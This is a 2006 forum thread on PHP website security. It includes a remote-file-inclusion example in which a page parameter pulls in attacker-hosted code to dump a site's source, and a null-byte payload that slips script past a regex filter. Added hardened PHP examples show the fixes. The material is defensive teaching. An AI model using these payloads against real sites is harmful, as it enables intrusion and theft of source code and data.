
Website Security..


NwS
09/28/2006, 17:53
Heya,

Can anyone provide any info on this subject?..

Thanks!
NwS

inet
09/29/2006, 04:39
Website Security is a very wide topic involving many parties (webmaster, programmer, host). What information are you looking for ;-)?

NwS
09/29/2006, 07:16
Heya,

I would like to know, first of all, the best way to protect your files from outside attempts to get info from them (if you know what I mean xD), MySQL security (I don't know a lot about this..), and I was just wondering how sites like PayPal, which are based on $, protect themselves and stuff, if you have any ideas..

Thanks for your time.
NwS

pokemon
10/03/2006, 00:10
For those coding PHP I recommend the book "Secure PHP Development" by Mohammed Kabir. It's not a HOWTO, but kind of a philosophical book for professional web developers.

NwS
10/03/2006, 17:08
Ah cool, thanks for the info, I'll check it out xD

blom
10/10/2006, 03:39
The answer is quite simple:

if ($know_what_you_are_doing) {
    write_code();
} else {
    die("Not allowed to write code");
}

Seriously, I'm getting so tired of these kiddies that pick up a book on PHP, start writing horrible code and get confused when they find out their database is empty. Read, people, don't be afraid to read! Don't know what SQL injection or XSS means? Don't write code unless you understand the concepts. Null byte, anyone? Go find out ...

contrid
10/10/2006, 03:52
@ Blom :

That's probably the funniest thing I've read in a long time.
I think you're scaring people... :)

trendywebs
10/10/2006, 04:30
Hehe, that was hilarious. Anyway... Null byte is a vulnerability which basically screws up CGI/PHP code and makes the functions function improperly at the HTTP preprocessor end. It happens mostly when you have file names with null bytes ;) Am I right, blom? And yes, you're so right that these days kiddies don't want to study anything... they want it ready-made, spoon-fed, right out of the box. ;)

contrid
10/10/2006, 06:07
Null byte, meaning injecting code into a URL and escaping other code. So, for example, if a script uses $_GET to obtain a specific filename, directory or path, it can easily be bypassed and escaped using something like "%00".

Another security vulnerability would be HTML code in strings. Hackers can use these to inject files into your scripts. For example, if you don't escape and convert all HTML characters posted by input fields, users can easily inject JavaScript, PHP, whatever into your site.

ludesign
10/10/2006, 07:22
Hello pplz,

There's no such thing as '100% secure' software or whatever else.

I want to share a few tips with you guys; most of them I'm facing too often in free scripts or even in paid ones.

First, the most common security bug is the use of register_globals. But I'll skip it and move on to include(); and $_GET.

More often I see code like this.


<?php

include($page.'.php');

?>


And URL http://somesite.com/index.php?page=news

As you can note, the code above is using register_globals; there's no validation or filtering of incoming data, and the value of ?page= is the name of the PHP file which the script should include. So all we need to do is to include your own script: upload it on a host without PHP support, so the include(); will read the PHP code, not the HTML returned from your PHP script. So let's say I write:


<?php

echo show_source('index.php');

?>


And save the file as show_source.php, then upload it to http://myhost.com/show_source.php and pass it to ?page like this:
http://somesite.com/index.php?page=http://myhost.com/show_source then I'll be able to see the source code of index.php, and you know what's next :) Also there are too many things you can do if you find such a security hole.

So some developers think that if they put all possible pages in an array and then check whether the value from ?page exists in the array, this will save them.

Let's imagine this situation:
If we have two files, index.php and home.php
index.php

<?php

$pages = array('page' => 'page.php', 'contact' => 'contact.php');
include('home.php');

?>


home.php

<?php

include($pages[$page]);

?>


So at first look this looks secure, but let's play around with it and break it down :P

The developer who wrote this is expecting all $_GET variables to come in from index.php, just like http://something/index.php?page=contact; then the script will look up the array by key and, if the key exists, will use the value assigned to this key to include the file. But we can call home.php directly, just like this:

http://something/main.php?pages[yourKey]=yourFilePath.php&page=yourKey

And again we'll be able to execute a remote script. This is possible because the array is created in index.php and used in home.php, so we can call home.php directly and create the array with your URL query (aka $_GET), and home.php will load your file.

There are too many ways, but I don't have time right now to share them all... next time I'll show you how you can bypass the MIME-type check in upload scripts so you will be able to upload whatever you want. Also I was thinking of showing you something with regexps and BBCodes which will allow you to run XSS...

Note: I'm not trying to teach you or to play "look at me, I'm so smart, who is like me?" ;)

P.S. Excuse my English, guys, and also I'm not too clear when I have to explain something :( I hope you will understand my examples.
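A hardened version of the include() dispatcher discussed in this post, added here as an example (it is not code from the thread). The page name is read explicitly from $_GET and used only as an exact key into a hardcoded map, so a remote URL, a "../" path or a "%00"-terminated value never reaches include(). The file names and the /var/www/pages directory are assumptions for the example.

```php
<?php
// Added example, not code from the thread: a hardened replacement for
// include($page.'.php') and for the $pages[$page] lookup shown above.
// The page name is read explicitly from $_GET (no register_globals) and is
// only ever used as an exact key into a hardcoded map, never as part of a
// path, so nothing the user sends ever reaches include().

declare(strict_types=1);

// Hardcoded allow-list: URL key => file inside one fixed directory.
// (File names are assumptions for the example.)
const PAGE_MAP = [
    'home'    => 'home.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

// Resolve a user-supplied page key to an absolute path, or null if it is not
// on the allow-list. array_key_exists compares the whole string byte for
// byte, so "news\0", "news.php" and "http://myhost.com/x" all return null.
function resolve_page(?string $requested, string $baseDir): ?string
{
    if ($requested === null || !array_key_exists($requested, PAGE_MAP)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGE_MAP[$requested];
}

if (PHP_SAPI === 'cli') {
    // Offline demonstration on constructed inputs, including the two bypasses
    // from the post (a remote URL and a null byte inside the value).
    $inputs = ['contact', 'http://myhost.com/show_source', "news\0", '../../etc/passwd', null];
    foreach ($inputs as $input) {
        $shown = $input === null ? '(missing)' : str_replace("\0", '\0', $input);
        printf("%-32s => %s\n", $shown, resolve_page($input, '/var/www/pages') ?? 'REJECTED');
    }
    exit;
}

// Web dispatcher: a non-string or unknown value falls back to a 404 instead
// of being echoed or included. Pair this with allow_url_include=Off in
// php.ini so include() cannot fetch remote files even if a bug slips in.
$requested = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : 'home';
$target = resolve_page($requested, __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```

Run it from the command line (php dispatcher.php) to see which of the constructed inputs resolve and which are rejected.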

contrid
10/10/2006, 09:01
Great post!
It also links to what I said about null byte.

I've seen code like that all over the web: the type you showed, where the page/file name is in the URL and is obtained with the $_GET function. This can easily be escaped with null byte values such as the %00 I explained earlier.

Soon hackers/users will be inside your php.ini and boot.ini or whatever ;)

ludesign
10/11/2006, 05:35
Thanks contrid.

I'll pay more attention to the null char (byte) in this post. Also I'll show you an example.

As contrid said, the null byte, known as null_char, is the first symbol in each symbol table and it's used to represent 'end of string'.

http://en.wikipedia.org/wiki/ASCII - here you can see it in the ASCII table;
http://en.wikipedia.org/wiki/Null_character - here you can read more about null char;

Well, next let's move to the example, and after that I'll explain it:


<?php

$page = $_GET['page'];
$page = preg_replace('/script/', '', $page);

print $page;

?>


So this should replace the 'script' in <script> and </script> tags, and it will. So let's play a little bit with this..

http://some/file.php?page=<script>alert('xss attack');</script>

Well, this won't hurt as much, because preg_replace will recognize the 'script' in <script> and </script> and will replace it with nothing. So simply it will output: <>alert('xss attack');

But if we try the same script, but this time with a null char... well, let's do it:

http://some/file.php?page=<s\0cript>alert('xss attack');</s\0cript>

And voilà ... we succeed; preg_replace won't match the 'script' in <script> because it will note the null char, and the preg_replace will do nothing to protect us, but IE won't recognize it, so the attack will succeed and an alert message box will appear on the screen saying 'XSS Attack' :)

FireFox will catch the null char and will terminate the script execution.

Sometimes we can run php code like we did with JS code ...

I don't have much time, I have to finish something, cya later guys, I'll show you another way to bypass the regexp validation.

I hope my posts will be useful for you and help you to protect your software much more.

P.S. Again, excuse my English... :rolleyes:
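Added example, not code from the thread: it runs the preg_replace('/script/') blacklist from the post above against both payloads to show the null-byte bypass, then applies the two fixes that actually hold, rejecting control characters on input and HTML-encoding on output, which is also the "escape and convert all HTML characters" point contrid made earlier. Function names are mine, not from the thread.

```php
<?php
// Added example, not code from the thread: why the preg_replace('/script/')
// blacklist above is bypassed by "<s\0cript>", and the two fixes that hold:
// refuse control characters on input, and HTML-encode on output so the
// browser never sees a tag at all, null byte or not.

declare(strict_types=1);

// The filter from the post: strips the word "script" and passes the rest on.
// Any byte inside the word, including NUL, makes the pattern miss.
function blacklist_filter(string $page): string
{
    return preg_replace('/script/', '', $page);
}

// Fix 1, input validation: a page name never legitimately contains NUL or
// other control characters, so reject the request instead of cleaning it.
function has_control_chars(string $s): bool
{
    return preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', $s) === 1;
}

// Fix 2, output encoding: every character that can open or close markup is
// turned into an entity, so "<s\0cript>" is rendered as text, not executed.
function safe_output(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Make the NUL byte visible as \0 when printing to a terminal.
function show(string $s): string
{
    return str_replace("\0", '\0', $s);
}

// Constructed inputs: the plain payload and the null-byte variant from the post.
$payloads = [
    "<script>alert('xss attack');</script>",
    "<s\0cript>alert('xss attack');</s\0cript>",
];
foreach ($payloads as $input) {
    printf("input      : %s\n", show($input));
    printf("blacklist  : %s\n", show(blacklist_filter($input)));
    printf("reject?    : %s\n", has_control_chars($input) ? 'yes' : 'no');
    printf("encoded    : %s\n\n", show(safe_output($input)));
}
```

On the second payload the blacklist line comes back unchanged (the bypass), while the reject check fires and the encoded line contains no raw "<" or ">" for any browser to act on.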